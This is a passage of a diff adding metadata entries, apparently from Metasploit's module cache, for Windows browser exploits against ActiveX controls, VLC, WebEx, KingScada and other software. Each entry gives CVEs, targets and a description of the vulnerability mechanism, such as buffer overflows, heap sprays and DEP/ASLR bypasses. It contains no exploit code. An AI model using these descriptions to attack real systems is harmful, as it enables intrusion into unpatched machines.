"exploit/windows/browser/sonicwall_addrouteentry", + "aliases": [], + "rank": 300, + "disclosure_date": "2007-11-01", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in SonicWall SSL-VPN NetExtender.\n By sending an overly long string to the \"AddRouteEntry()\" method located\n in the NELaunchX.dll (1.0.0.26) Control, an attacker may be able to execute\n arbitrary code.", + "references": [ + "CVE-2007-5603", + "OSVDB-39069", + "URL-http://www.sec-consult.com/303.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "IE 6 / Windows XP SP2 Pro English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/sonicwall_addrouteentry.rb", + "is_install_path": true, + "ref_name": "windows/browser/sonicwall_addrouteentry", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/symantec_altirisdeployment_downloadandinstall": { + "name": "Symantec Altiris Deployment Solution ActiveX Control Arbitrary File Download and Execute", + "fullname": "exploit/windows/browser/symantec_altirisdeployment_downloadandinstall", + "aliases": [], + "rank": 600, + "disclosure_date": "2009-09-09", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module allows remote attackers to install and execute arbitrary files on a users file system via\n AeXNSPkgDLLib.dll (6.0.0.1418). This module was tested against Symantec Altiris Deployment Solution 6.9 sp3.", + "references": [ + "BID-36346", + "CVE-2009-3028", + "OSVDB-57893" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/symantec_altirisdeployment_downloadandinstall.rb", + "is_install_path": true, + "ref_name": "windows/browser/symantec_altirisdeployment_downloadandinstall", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/symantec_altirisdeployment_runcmd": { + "name": "Symantec Altiris Deployment Solution ActiveX Control Buffer Overflow", + "fullname": "exploit/windows/browser/symantec_altirisdeployment_runcmd", + "aliases": [], + "rank": 300, + "disclosure_date": "2009-11-04", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in Symantec Altiris Deployment Solution.\n When sending an overly long string to RunCmd() method of\n AeXNSConsoleUtilities.dll (6.0.0.1426) an attacker may be able to execute arbitrary\n code.", + "references": [ + "CVE-2009-3033", + "BID-37092", + "OSVDB-60496" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/symantec_altirisdeployment_runcmd.rb", + "is_install_path": true, + "ref_name": "windows/browser/symantec_altirisdeployment_runcmd", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/symantec_appstream_unsafe": { + "name": "Symantec AppStream LaunchObj ActiveX Control Arbitrary File Download and Execute", + "fullname": "exploit/windows/browser/symantec_appstream_unsafe", + "aliases": [], + "rank": 600, + "disclosure_date": "2009-01-15", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a vulnerability in Symantec AppStream Client 5.x. The vulnerability\n is in the LaunchObj ActiveX control (launcher.dll 5.1.0.82) containing the \"installAppMgr()\"\n method. The insecure method can be exploited to download and execute arbitrary files in the\n context of the currently logged-on user.", + "references": [ + "CVE-2008-4388", + "OSVDB-51410" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/symantec_appstream_unsafe.rb", + "is_install_path": true, + "ref_name": "windows/browser/symantec_appstream_unsafe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/symantec_backupexec_pvcalendar": { + "name": "Symantec BackupExec Calendar Control Buffer Overflow", + "fullname": "exploit/windows/browser/symantec_backupexec_pvcalendar", + "aliases": [], + "rank": 300, + "disclosure_date": "2008-02-28", + "type": "exploit", + "author": [ + "Elazar Broad " + ], + "description": "This module exploits a stack buffer overflow in Symantec BackupExec Calendar Control.\n By sending an overly long string to the \"_DOWText0\" property located\n in the pvcalendar.ocx control, an attacker may be able to execute\n arbitrary code.", + "references": [ + "CVE-2007-6016", + "OSVDB-42358", + "BID-26904", + "URL-http://web.archive.org/web/20080302192347/http://secunia.com:80/advisories/27885/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP0-SP2 / IE 6.0 SP0-2 & IE 7.0 English" + ], + "mod_time": "2023-03-23 10:19:30 +0000", + "path": "/modules/exploits/windows/browser/symantec_backupexec_pvcalendar.rb", + "is_install_path": true, + "ref_name": "windows/browser/symantec_backupexec_pvcalendar", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/symantec_consoleutilities_browseandsavefile": { + "name": "Symantec ConsoleUtilities ActiveX Control Buffer Overflow", + "fullname": "exploit/windows/browser/symantec_consoleutilities_browseandsavefile", + "aliases": [], + "rank": 300, + "disclosure_date": "2009-11-02", + "type": "exploit", + "author": [ + "Nikolas Sotiriu (lofi)" + ], + "description": "This module exploits a stack buffer overflow in Symantecs ConsoleUtilities.\n By sending an overly long string to the \"BrowseAndSaveFile()\" method located\n in the AeXNSConsoleUtilities.dll (6.0.0.1846) Control, an attacker may be able to\n execute arbitrary code", + "references": [ + "CVE-2009-3031", + "OSVDB-59597", + "BID-36698", + "URL-http://sotiriu.de/adv/NSOADV-2009-001.txt", + "URL-http://www.symantec.com/business/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2009&suid=20091102_00" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP3 English", + "Windows XP SP2 Universal", + "Windows XP SP2 Pro German", + "Windows XP SP3 Pro German" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/symantec_consoleutilities_browseandsavefile.rb", + "is_install_path": true, + "ref_name": "windows/browser/symantec_consoleutilities_browseandsavefile", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/synactis_connecttosynactis_bof": { + "name": "Synactis PDF In-The-Box ConnectToSynactic Stack Buffer Overflow", + "fullname": "exploit/windows/browser/synactis_connecttosynactis_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-05-30", + "type": "exploit", + "author": [ + "h1ch4m", + "sinn3r " + ], + "description": "This module exploits a vulnerability found in Synactis' PDF In-The-Box ActiveX\n component, specifically PDF_IN_1.ocx. When a long string of data is given\n to the ConnectToSynactis function, which is meant to be used for the ldCmdLine\n argument of a WinExec call, a strcpy routine can end up overwriting a TRegistry\n class pointer saved on the stack, resulting in arbitrary code execution under the\n context of the user.\n\n Also note that since the WinExec function is used to call the default browser,\n you must be aware that: 1) The default must be Internet Explorer, and 2) when the\n exploit runs, another browser will pop up.\n\n Synactis PDF In-The-Box is also used by other software such as Logic Print 2013,\n which is how the vulnerability was found and publicly disclosed.", + "references": [ + "OSVDB-93754", + "EDB-25835" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "IE 7 on Windows XP SP3", + "IE 8 on Windows XP SP3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/synactis_connecttosynactis_bof.rb", + "is_install_path": true, + "ref_name": "windows/browser/synactis_connecttosynactis_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/systemrequirementslab_unsafe": { + "name": "Husdawg, LLC. System Requirements Lab ActiveX Unsafe Method", + "fullname": "exploit/windows/browser/systemrequirementslab_unsafe", + "aliases": [], + "rank": 600, + "disclosure_date": "2008-10-16", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module allows attackers to execute code via an unsafe method in\n Husdawg, LLC. System Requirements Lab ActiveX Control (sysreqlab2.dll 2.30.0.0)", + "references": [ + "CVE-2008-4385", + "OSVDB-50122", + "US-CERT-VU-166651" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/systemrequirementslab_unsafe.rb", + "is_install_path": true, + "ref_name": "windows/browser/systemrequirementslab_unsafe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/teechart_pro": { + "name": "TeeChart Professional ActiveX Control Trusted Integer Dereference", + "fullname": "exploit/windows/browser/teechart_pro", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-08-11", + "type": "exploit", + "author": [ + "mr_me ", + "sinn3r " + ], + "description": "This module exploits an integer overflow in TeeChart Pro ActiveX control. When\n sending an overly large/negative integer value to the AddSeries() property of\n TeeChart2010.ocx, the code will perform an arithmetic operation that wraps the\n value and is later directly trusted and called upon.\n\n This module has been designed to bypass DEP only under IE8 with Java support. Multiple\n versions (including the latest version) are affected by this vulnerability that date\n back to as far as 2001.\n\n The following controls are vulnerable:\n\n TeeChart5.ocx Version 5.0.1.0 (clsid: B6C10489-FB89-11D4-93C9-006008A7EED4);\n TeeChart6.ocx Version 6.0.0.5 (clsid: 536600D3-70FE-4C50-92FB-640F6BFC49AD);\n TeeChart7.ocx Version 7.0.1.4 (clsid: FAB9B41C-87D6-474D-AB7E-F07D78F2422E);\n TeeChart8.ocx Version 8.0.0.8 (clsid: BDEB0088-66F9-4A55-ABD2-0BF8DEEC1196);\n TeeChart2010.ocx Version 2010.0.0.3 (clsid: FCB4B50A-E3F1-4174-BD18-54C3B3287258).\n\n The controls are deployed under several SCADA based systems including:\n\n Unitronics OPC server v1.3;\n BACnet Operator Workstation Version 1.0.76", + "references": [ + "OSVDB-74446", + "URL-http://www.stratsec.net/Research/Advisories/TeeChart-Professional-Integer-Overflow" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Windows XP SP0-SP3 (IE6/IE7)", + "Windows XP SP0-SP3 + JAVA + DEP bypass (IE8)", + "Windows 7 + JAVA + DEP bypass (IE8)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/teechart_pro.rb", + "is_install_path": true, + "ref_name": "windows/browser/teechart_pro", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/tom_sawyer_tsgetx71ex552": { + "name": "Tom Sawyer Software GET Extension Factory Remote Code Execution", + "fullname": "exploit/windows/browser/tom_sawyer_tsgetx71ex552", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-05-03", + "type": "exploit", + "author": [ + "Elazar Broad", + "rgod", + "juan vazquez " + ], + "description": "This module exploits a remote code execution vulnerability in the tsgetx71ex553.dll\n ActiveX control installed with Tom Sawyer GET Extension Factory due to an incorrect\n initialization under Internet Explorer.\n\n While the Tom Sawyer GET Extension Factory is installed with some versions of VMware\n Infrastructure Client, this module has been tested only with the versions installed\n with Embarcadero Technologies ER/Studio XE2 / Embarcadero Studio Portal 1.6. The ActiveX\n control tested is tsgetx71ex553.dll, version 5.5.3.238.\n\n This module achieves DEP and ASLR bypass using the well known msvcr71.dll rop chain. The\n dll is installed by default with the Embarcadero software, and loaded by the targeted\n ActiveX.", + "references": [ + "CVE-2011-2217", + "OSVDB-73211", + "BID-48099", + "URL-http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=911" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "IE 6 on Windows XP SP3", + "IE 7 on Windows XP SP3", + "IE 8 on Windows XP SP3", + "IE 8 on Windows 7 SP1" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/tom_sawyer_tsgetx71ex552.rb", + "is_install_path": true, + "ref_name": "windows/browser/tom_sawyer_tsgetx71ex552", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/trendmicro_extsetowner": { + "name": "Trend Micro Internet Security Pro 2010 ActiveX extSetOwner() Remote Code Execution", + "fullname": "exploit/windows/browser/trendmicro_extsetowner", + "aliases": [], + "rank": 300, + "disclosure_date": "2010-08-25", + "type": "exploit", + "author": [ + "Trancer " + ], + "description": "This module exploits a remote code execution vulnerability in Trend Micro\n Internet Security Pro 2010 ActiveX.\n When sending an invalid pointer to the extSetOwner() function of UfPBCtrl.dll\n an attacker may be able to execute arbitrary code.", + "references": [ + "CVE-2010-3189", + "OSVDB-67561", + "ZDI-10-165", + "EDB-14878" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP0-SP2 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/trendmicro_extsetowner.rb", + "is_install_path": true, + "ref_name": "windows/browser/trendmicro_extsetowner", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/trendmicro_officescan": { + "name": "Trend Micro OfficeScan Client ActiveX Control Buffer Overflow", + "fullname": "exploit/windows/browser/trendmicro_officescan", + "aliases": [], + "rank": 300, + "disclosure_date": "2007-02-12", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in Trend Micro OfficeScan\n Corporate Edition 7.3. By sending an overly long string to the\n \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control,\n an attacker may be able to execute arbitrary code.", + "references": [ + "CVE-2007-0325", + "OSVDB-33040", + "BID-22585" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP2 Pro English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/trendmicro_officescan.rb", + "is_install_path": true, + "ref_name": "windows/browser/trendmicro_officescan", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/tumbleweed_filetransfer": { + "name": "Tumbleweed FileTransfer vcst_eu.dll ActiveX Control Buffer Overflow", + "fullname": "exploit/windows/browser/tumbleweed_filetransfer", + "aliases": [], + "rank": 500, + "disclosure_date": "2008-04-07", + "type": "exploit", + "author": [ + "aushack " + ], + "description": "This module exploits a stack buffer overflow in the vcst_eu.dll\n FileTransfer Module (1.0.0.5) ActiveX control in the Tumbleweed\n SecureTransport suite. By sending an overly long string to the\n TransferFile() 'remotefile' function, an attacker may be able\n to execute arbitrary code.", + "references": [ + "CVE-2008-1724", + "OSVDB-44252", + "URL-http://www.aushack.com/200708-tumbleweed.txt" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Universal vcst_eu.dll", + "Windows 2000 Pro English", + "Windows XP Pro SP0/SP1 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/tumbleweed_filetransfer.rb", + "is_install_path": true, + "ref_name": "windows/browser/tumbleweed_filetransfer", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ubisoft_uplay_cmd_exec": { + "name": "Ubisoft uplay 2.0.3 ActiveX Control Arbitrary Code Execution", + "fullname": "exploit/windows/browser/ubisoft_uplay_cmd_exec", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-07-29", + "type": "exploit", + "author": [ + "Tavis Ormandy ", + "Ben Campbell ", + "phillips321 ", + "Richard Hicks " + ], + "description": "The uplay ActiveX component allows an attacker to execute any command line action.\n User must sign in, unless auto-sign in is enabled and uplay must not already be\n running. Due to the way the malicious executable is served (WebDAV), the module\n must be run on port 80, so please make sure you have enough privilege to do that.\n Ubisoft released patch 2.04 as of Mon 20th July.", + "references": [ + "CVE-2012-4177", + "OSVDB-84402", + "URL-https://seclists.org/fulldisclosure/2012/Jul/375", + "URL-http://forums.ubi.com/showthread.php/699940-Uplay-PC-Patch-2-0-4-Security-fix" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/ubisoft_uplay_cmd_exec.rb", + "is_install_path": true, + "ref_name": "windows/browser/ubisoft_uplay_cmd_exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ultramjcam_openfiledig_bof": { + "name": "TRENDnet SecurView Internet Camera UltraMJCam OpenFileDlg Buffer Overflow", + "fullname": "exploit/windows/browser/ultramjcam_openfiledig_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-03-28", + "type": "exploit", + "author": [ + "rgod", + "sinn3r " + ], + "description": "This module exploits a vulnerability found in TRENDnet SecurView Internet\n Camera's ActiveX control. By supplying a long string of data as the sFilter\n argument of the OpenFileDlg() function, it is possible to trigger a buffer\n overflow condition due to WideCharToMultiByte (which converts unicode back to)\n overwriting the stack more than it should, which results arbitrary code execution\n under the context of the user.", + "references": [ + "CVE-2012-4876", + "OSVDB-80661", + "EDB-18675" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "IE 6 on Windows XP SP3", + "IE 7 on Windows XP SP3", + "IE 7 on Windows Vista" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/ultramjcam_openfiledig_bof.rb", + "is_install_path": true, + "ref_name": "windows/browser/ultramjcam_openfiledig_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ultraoffice_httpupload": { + "name": "Ultra Shareware Office Control ActiveX HttpUpload Buffer Overflow", + "fullname": "exploit/windows/browser/ultraoffice_httpupload", + "aliases": [], + "rank": 400, + "disclosure_date": "2008-08-27", + "type": "exploit", + "author": [ + "shinnai", + "jduck " + ], + "description": "This module exploits a stack-based buffer overflow in Ultra Shareware's Office\n Control. When processing the 'HttpUpload' method, the arguments are concatenated\n together to form a command line to run a bundled version of cURL. If the command\n fails to run, a stack-based buffer overflow occurs when building the error\n message. This is due to the use of sprintf() without proper bounds checking.\n\n NOTE: Due to input restrictions, this exploit uses a heap-spray to get the payload\n into memory unmodified.", + "references": [ + "CVE-2008-3878", + "OSVDB-47866", + "BID-30861", + "EDB-6318" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/ultraoffice_httpupload.rb", + "is_install_path": true, + "ref_name": "windows/browser/ultraoffice_httpupload", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/verypdf_pdfview": { + "name": "VeryPDF PDFView OCX ActiveX OpenPDF Heap Overflow", + "fullname": "exploit/windows/browser/verypdf_pdfview", + "aliases": [], + "rank": 300, + "disclosure_date": "2008-06-16", + "type": "exploit", + "author": [ + "MC ", + "dean " + ], + "description": "The VeryPDF PDFView ActiveX control is prone to a heap buffer-overflow\n because it fails to properly bounds-check user-supplied data before copying\n it into an insufficiently sized memory buffer. An attacker can exploit this issue\n to execute arbitrary code within the context of the affected application.", + "references": [ + "CVE-2008-5492", + "OSVDB-49871", + "BID-32313" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/verypdf_pdfview.rb", + "is_install_path": true, + "ref_name": "windows/browser/verypdf_pdfview", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/viscom_movieplayer_drawtext": { + "name": "Viscom Software Movie Player Pro SDK ActiveX 6.8", + "fullname": "exploit/windows/browser/viscom_movieplayer_drawtext", + "aliases": [], + "rank": 300, + "disclosure_date": "2010-01-12", + "type": "exploit", + "author": [ + "shinnai", + "TecR0c ", + "mr_me " + ], + "description": "Stack-based buffer overflow in the MOVIEPLAYER.MoviePlayerCtrl.1 ActiveX control\n in MoviePlayer.ocx 6.8.0.0 in Viscom Software Movie Player Pro SDK ActiveX 6.8 allows\n remote attackers to execute arbitrary code via a long strFontName parameter to the\n DrawText method.\n\n The victim will first be required to trust the publisher Viscom Software.\n This module has been designed to bypass DEP and ASLR under XP IE8, Vista and Win7\n with Java support.", + "references": [ + "CVE-2010-0356", + "OSVDB-61634", + "EDB-12320" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Windows IE6-7", + "Windows IE8 + JAVA 6 (DEP & ASLR BYPASS)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/viscom_movieplayer_drawtext.rb", + "is_install_path": true, + "ref_name": "windows/browser/viscom_movieplayer_drawtext", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/vlc_amv": { + "name": "VLC AMV Dangling Pointer Vulnerability", + "fullname": "exploit/windows/browser/vlc_amv", + "aliases": [], + "rank": 400, + "disclosure_date": "2011-03-23", + "type": "exploit", + "author": [ + "sinn3r " + ], + "description": "This module exploits VLC media player when handling a .AMV file. By flipping\n the 0x41st byte in the file format (video width/height), VLC crashes due to an\n invalid pointer, which allows remote attackers to gain arbitrary code execution.\n The vulnerable packages include: VLC 1.1.4, VLC 1.1.5, VLC 1.1.6, VLC 1.1.7. Also,\n please note that IE 8 targets require Java support in order to run properly.", + "references": [ + "CVE-2010-3275", + "OSVDB-71277", + "URL-http://www.coresecurity.com/content/vlc-vulnerabilities-amv-nsv-files", + "URL-http://web.archive.org/web/20130610070348/http://git.videolan.org/?p=vlc/vlc-1.1.git;a=commitdiff;h=fe44129dc6509b3347113ab0e1a0524af1e0dd11" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Internet Explorer 6 on XP SP3", + "Internet Explorer 7 on XP SP3", + "Internet Explorer 8 on XP SP3", + "Internet Explorer 7 on Vista" + ], + "mod_time": "2025-02-28 09:35:28 +0000", + "path": "/modules/exploits/windows/browser/vlc_amv.rb", + "is_install_path": true, + "ref_name": "windows/browser/vlc_amv", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/vlc_mms_bof": { + "name": "VLC MMS Stream Handling Buffer Overflow", + "fullname": "exploit/windows/browser/vlc_mms_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-03-15", + "type": "exploit", + "author": [ + "Florent Hochwelker", + "sinn3r ", + "juan vazquez " + ], + "description": "This module exploits a buffer overflow in VLC media player VLC media player prior\n to 2.0.0. The vulnerability is due to a dangerous use of sprintf which can result\n in a stack buffer overflow when handling a malicious MMS URI.\n\n This module uses the browser as attack vector. A specially crafted MMS URI is\n used to trigger the overflow and get flow control through SEH overwrite. Control\n is transferred to code located in the heap through a standard heap spray.\n\n The module only targets IE6 and IE7 because no DEP/ASLR bypass has been provided.", + "references": [ + "CVE-2012-1775", + "OSVDB-80188", + "URL-http://www.videolan.org/security/sa1201.html", + "URL-http://web.archive.org/web/20130612051447/http://git.videolan.org/?p=vlc/vlc-2.0.git;a=commit;h=11a95cce96fffdbaba1be6034d7b42721667821c" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Internet Explorer 6 on XP SP3", + "Internet Explorer 7 on XP SP3" + ], + "mod_time": "2025-02-28 09:35:28 +0000", + "path": "/modules/exploits/windows/browser/vlc_mms_bof.rb", + "is_install_path": true, + "ref_name": "windows/browser/vlc_mms_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/webdav_dll_hijacker": { + "name": "WebDAV Application DLL Hijacker", + "fullname": "exploit/windows/browser/webdav_dll_hijacker", + "aliases": [], + "rank": 0, + "disclosure_date": "2010-08-18", + "type": "exploit", + "author": [ + "hdm ", + "jduck ", + "jcran " + ], + "description": "This module presents a directory of file extensions that can lead to\n code execution when opened from the share. The default EXTENSIONS option\n must be configured to specify a vulnerable application type.", + "references": [ + "URL-http://blog.zoller.lu/2010/08/cve-2010-xn-loadlibrarygetprocaddress.html", + "URL-http://www.acrossecurity.com/aspr/ASPR-2010-08-18-1-PUB.txt" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/webdav_dll_hijacker.rb", + "is_install_path": true, + "ref_name": "windows/browser/webdav_dll_hijacker", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/webex_ucf_newobject": { + "name": "WebEx UCF atucfobj.dll ActiveX NewObject Method Buffer Overflow", + "fullname": "exploit/windows/browser/webex_ucf_newobject", + "aliases": [], + "rank": 400, + "disclosure_date": "2008-08-06", + "type": "exploit", + "author": [ + "Tobias Klein", + "Elazar Broad", + "Guido Landi", + "jduck " + ], + "description": "This module exploits a stack-based buffer overflow in WebEx's WebexUCFObject\n ActiveX Control. If a long string is passed to the 'NewObject' method, a stack-\n based buffer overflow will occur when copying attacker-supplied data using the\n sprintf function.\n\n It is noteworthy that this vulnerability was discovered and reported by multiple\n independent researchers. To quote iDefense's advisory, \"Before this issue was\n publicly reported, at least three independent security researchers had knowledge\n of this issue; thus, it is reasonable to believe that even more people were aware\n of this issue before disclosure.\"\n\n NOTE: Due to input restrictions, this exploit uses a heap-spray to get the payload\n into memory unmodified.", + "references": [ + "CVE-2008-3558", + "OSVDB-47344", + "BID-30578", + "EDB-6220", + "URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=849", + "URL-http://www.trapkit.de/advisories/TKADV2008-009.txt", + "URL-http://tk-blog.blogspot.com/2008/09/vulnerability-rediscovery-xss-and-webex.html", + "URL-http://archives.neohapsis.com/archives/fulldisclosure/2008-08/0084.html", + "URL-http://www.cisco.com/en/US/products/products_security_advisory09186a00809e2006.shtml" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/webex_ucf_newobject.rb", + "is_install_path": true, + "ref_name": "windows/browser/webex_ucf_newobject", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/wellintech_kingscada_kxclientdownload": { + "name": "KingScada kxClientDownload.ocx ActiveX Remote Code Execution", + "fullname": "exploit/windows/browser/wellintech_kingscada_kxclientdownload", + "aliases": [], + "rank": 400, + "disclosure_date": "2014-01-14", + "type": "exploit", + "author": [ + "Andrea Micalizzi", + "juan vazquez " + ], + "description": "This module abuses the kxClientDownload.ocx ActiveX control distributed with WellingTech KingScada.\n The ProjectURL property can be abused to download and load arbitrary DLLs from\n arbitrary locations, leading to arbitrary code execution, because of a dangerous\n usage of LoadLibrary. Due to the nature of the vulnerability, this module will work\n only when Protected Mode is not present or not enabled.", + "references": [ + "CVE-2013-2827", + "OSVDB-102135", + "BID-64941", + "ZDI-14-011", + "URL-http://ics-cert.us-cert.gov/advisories/ICSA-13-344-01" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/wellintech_kingscada_kxclientdownload.rb", + "is_install_path": true, + "ref_name": "windows/browser/wellintech_kingscada_kxclientdownload", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/winamp_playlist_unc": { + "name": "Winamp Playlist UNC Path Computer Name Overflow", + "fullname": "exploit/windows/browser/winamp_playlist_unc", + "aliases": [], + "rank": 500, + "disclosure_date": "2006-01-29", + "type": "exploit", + "author": [ + "hdm ", + "Faithless " + ], + "description": "This module exploits a vulnerability in the Winamp media player.\n This flaw is triggered when an audio file path is specified, inside 